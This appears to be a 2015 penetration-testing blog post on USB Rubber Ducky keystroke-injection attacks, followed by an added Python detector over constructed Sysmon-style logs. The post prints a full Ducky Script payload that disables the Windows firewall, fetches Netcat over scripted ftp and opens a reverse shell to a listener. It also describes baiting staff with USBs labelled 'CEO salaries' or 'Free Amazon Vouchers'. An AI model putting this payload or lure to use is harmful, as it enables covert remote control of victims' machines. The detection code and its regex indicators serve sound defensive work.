December 23, 2015

Some customers assume the USB threat went away with Windows 7, where AutoRun for removable media is disabled by default. That does blunt the classic attack vector, a malicious autorun.inf launching a file straight from the stick, but it does nothing against a USB Rubber Ducky attack.

What’s the difference?

A Rubber Ducky attack works differently: it does not execute an .exe or similar file from the device at all. The Rubber Ducky enumerates as a USB keyboard (a HID device), which AV and endpoint protection do not flag as malicious or as a virus, and then types a scripted sequence of keystrokes at machine speed. To the operating system it is indistinguishable from a user plugging in an external keyboard and typing those commands by hand.

The following Ducky Script source (the raw code that is compiled into the payload the device replays) opens a command prompt, disables the Windows firewall, uses the built-in ftp client with a scripted command file to download Netcat, and then launches Netcat as a reverse shell to a listener at the specified IP and port.

REM Give the host time to enumerate the device and install the HID keyboard driver
DELAY 10000
REM Open the Run dialog (Windows key + R) and start a command prompt
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
REM Turn off the Windows firewall: the built-in ftp client only does active mode, so its inbound data connection would otherwise be blocked
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
REM Build a command file for the ftp client: server, user, password, binary mode, fetch nc.exe, quit
STRING echo open ftp.something.com 21 > ftp.txt
ENTER
DELAY 100
STRING echo user@something.com>> ftp.txt
ENTER
DELAY 100
STRING echo password>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
REM Run the ftp client non-interactively from that file, then remove it and close the prompt
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
REM Start Netcat from the Run dialog (its working directory is %USERPROFILE%, where nc.exe landed) as a reverse shell to the listener
GUI r
DELAY 200
STRING nc -nv X.X.X.X 3333 -e cmd.exe
ENTER
DELAY 2000
REM Open and immediately close a second prompt so the Netcat window does not stay in the foreground
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER

We were recently engaged by a Fortune 500 company for a pentest. They had sound defenses in place, yet their laptops were compromised this way and a lot of juicy information could be harvested. FireEye, McAfee ePO and all the endpoint defenses they had in place couldn't stop users plugging in a Rubber Ducky, especially not when the Rubber Ducky is labelled "CEO salaries 2015", "Free Amazon Vouchers" or "Free Expedia Vouchers". 8/10 USBs were plugged in and 8/10 shells were received.

The company has security in place and employees are taught not to plug in unknown devices, but hey… curiosity and the opportunity to gain something for free beat any security policy…
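What the file-scanning defenses above never saw is still visible elsewhere: every command the device types becomes an ordinary process-creation event (Sysmon Event ID 1, or Security event 4688 with command-line logging enabled). The detector below is an added example, not from the original post or from any of the products named: it runs two checks over such events, the command-line indicators this payload leaves (firewall off, scripted ftp download, Netcat with -e cmd.exe) correlated per host, and a weaker keystroke-injection signal, command lines reaching cmd.exe faster than a person could type them. The log lines are constructed for the example, with 203.0.113.5 standing in for the post's X.X.X.X; the 60-second window and the typing-speed threshold are assumptions.

```python
"""Spotting the typed payload in process-creation telemetry.

Added example, not from the original post. Keyboard emulation gives AV no
file to scan, but every command the device types still lands as a process-
creation event (Sysmon Event ID 1 / Security 4688). Two checks run here:
the payload's command-line indicators correlated per host, and command
lines that reach cmd.exe sooner than a person could have typed them.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Sysmon-style JSON-lines events (a subset of the Event ID 1
# fields); not real telemetry. One host runs the payload from the post,
# plus two unrelated benign events. cmd built-ins (cd, echo) create no
# process, so they never appear in this kind of log.
SAMPLE_LOG = r"""
{"UtcTime": "2015-12-23 09:14:02.100", "Computer": "LAPTOP-42", "Image": "C:\\Windows\\notepad.exe", "CommandLine": "notepad", "ProcessId": 2900, "ParentImage": "C:\\Windows\\explorer.exe", "ParentProcessId": 1200}
{"UtcTime": "2015-12-23 09:15:10.400", "Computer": "LAPTOP-42", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd", "ProcessId": 3000, "ParentImage": "C:\\Windows\\explorer.exe", "ParentProcessId": 1200}
{"UtcTime": "2015-12-23 09:15:11.100", "Computer": "LAPTOP-42", "Image": "C:\\Windows\\System32\\netsh.exe", "CommandLine": "netsh firewall set opmode disable", "ProcessId": 3004, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentProcessId": 3000}
{"UtcTime": "2015-12-23 09:15:14.200", "Computer": "LAPTOP-42", "Image": "C:\\Windows\\System32\\ftp.exe", "CommandLine": "ftp -s:ftp.txt", "ProcessId": 3010, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentProcessId": 3000}
{"UtcTime": "2015-12-23 09:15:18.900", "Computer": "LAPTOP-42", "Image": "C:\\Users\\jdoe\\nc.exe", "CommandLine": "nc -nv 203.0.113.5 3333 -e cmd.exe", "ProcessId": 3020, "ParentImage": "C:\\Windows\\explorer.exe", "ParentProcessId": 1200}
{"UtcTime": "2015-12-23 09:15:19.000", "Computer": "LAPTOP-42", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe", "ProcessId": 3022, "ParentImage": "C:\\Users\\jdoe\\nc.exe", "ParentProcessId": 3020}
{"UtcTime": "2015-12-23 09:20:00.000", "Computer": "DESKTOP-7", "Image": "C:\\Windows\\System32\\ipconfig.exe", "CommandLine": "ipconfig /all", "ProcessId": 4100, "ParentImage": "C:\\Windows\\System32\\cmd.exe", "ParentProcessId": 4000}
"""

INDICATORS = {
    "firewall disabled": re.compile(r"netsh\s+(?:adv)?firewall\s+set\s+.*\b(?:opmode\s+disable|state\s+off)", re.I),
    "scripted ftp download": re.compile(r"\bftp(?:\.exe)?\s+.*-s:", re.I),
    "reverse shell": re.compile(r"\s-e\s+cmd(?:\.exe)?\b", re.I),
}
WINDOW = timedelta(seconds=60)   # assumed: how close together the chain must be
MIN_HUMAN_MS_PER_CHAR = 80       # assumed: faster than this is not a person typing


def parse(log: str) -> list:
    events = []
    for line in log.strip().splitlines():
        ev = json.loads(line)
        ev["UtcTime"] = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")
        events.append(ev)
    return sorted(events, key=lambda e: e["UtcTime"])


def correlate(events, window=WINDOW) -> list:
    """One alert per host where two or more distinct indicators fire within
    `window` of the first hit on that host."""
    by_host = defaultdict(list)
    for ev in events:
        for name, rx in INDICATORS.items():
            if rx.search(ev["CommandLine"]):
                by_host[ev["Computer"]].append((ev["UtcTime"], name, ev["CommandLine"]))
    alerts = []
    for host, hits in by_host.items():
        hits.sort()
        start = hits[0][0]
        chain = [(name, cmd) for t, name, cmd in hits if t - start <= window]
        if len({name for name, _ in chain}) >= 2:
            alerts.append({"host": host, "start": start, "chain": chain})
    return alerts


def injected_typing(events, min_ms_per_char=MIN_HUMAN_MS_PER_CHAR) -> list:
    """Children of an interactive cmd.exe whose command line arrives sooner after
    the previous event in that console than a person could have typed it.

    Heuristic only: built-ins produce no event, so the character count is a
    lower bound and a fast run can slip through (the ftp line above does).
    Process IDs are assumed unique within the sample (no PID reuse).
    """
    by_pid = {ev["ProcessId"]: ev for ev in events}
    last_seen = {}      # console (parent pid) -> time of its previous event
    flagged = []
    for ev in events:
        parent = by_pid.get(ev["ParentProcessId"])
        if parent is None or not parent["Image"].lower().endswith("cmd.exe"):
            continue
        prev = last_seen.get(parent["ProcessId"], parent["UtcTime"])
        elapsed_ms = (ev["UtcTime"] - prev).total_seconds() * 1000
        if elapsed_ms / max(len(ev["CommandLine"]), 1) < min_ms_per_char:
            flagged.append((ev["Computer"], ev["CommandLine"], round(elapsed_ms)))
        last_seen[parent["ProcessId"]] = ev["UtcTime"]
    return flagged


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    for alert in correlate(evs):
        print(alert["host"], alert["start"], [name for name, _ in alert["chain"]])
    for host, cmd, ms in injected_typing(evs):
        print(f"{host}: {cmd!r} arrived {ms} ms after the previous event in that console")
```

Two caveats from the sample itself: the parent of both cmd.exe and nc.exe is explorer.exe, exactly as it would be for a user launching them from the Run dialog, so parent-child shape alone does not separate this from a human; and the Security log only carries the command line when "Include command line in process creation events" is enabled, whereas Sysmon records it by default.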

For folks interested in the USB Rubber Ducky, here is the link:
http://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe?variant=353378649
